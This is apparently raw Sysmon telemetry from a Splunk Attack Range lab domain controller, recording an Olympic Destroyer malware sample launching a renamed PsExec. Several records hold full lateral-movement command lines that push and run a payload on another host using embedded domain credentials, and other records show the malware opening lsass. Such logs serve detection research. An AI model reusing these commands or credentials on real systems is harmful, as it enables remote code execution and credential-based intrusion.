10341000x8000000000000000293284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.651{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1320-6216-5C06-000000003802}6276C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.651{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1320-6216-5C06-000000003802}6276C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.633{C8EA50B7-1320-6216-5C06-000000003802}6276516C:\Windows\system32\conhost.exe{C8EA50B7-1320-6216-5B06-000000003802}2696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.598{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1320-6216-5C06-000000003802}6276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.582{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1320-6216-5C06-000000003802}6276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.482{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.466{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1320-6216-5B06-000000003802}2696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.451{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1320-6216-5B06-000000003802}2696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.463{C8EA50B7-1320-6216-5B06-000000003802}2696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.451{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1320-6216-5B06-000000003802}2696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.451{C8EA50B7-1320-6216-5906-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.435{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1320-6216-5906-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.435{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1320-6216-5906-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:36.413{C8EA50B7-1320-6216-5906-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.350{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1320-6216-5A06-000000003802}340C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.350{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1320-6216-5A06-000000003802}340C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.335{C8EA50B7-1320-6216-5A06-000000003802}3406396C:\Windows\system32\conhost.exe{C8EA50B7-1320-6216-5906-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.312{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1320-6216-5A06-000000003802}340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.297{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1320-6216-5A06-000000003802}340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.181{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.181{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.181{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.181{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.181{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0BFEB27109668710D9AEFE085095AD20,SHA256=95A79BF86CA624EF6F20EC380049F12E8903BE43CCFC48EBF17CD2450C970495,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.166{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1320-6216-5906-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.166{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1320-6216-5906-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.168{C8EA50B7-1320-6216-5906-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.166{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1320-6216-5906-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.150{C8EA50B7-131F-6216-5706-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:36.134{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-131F-6216-5706-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 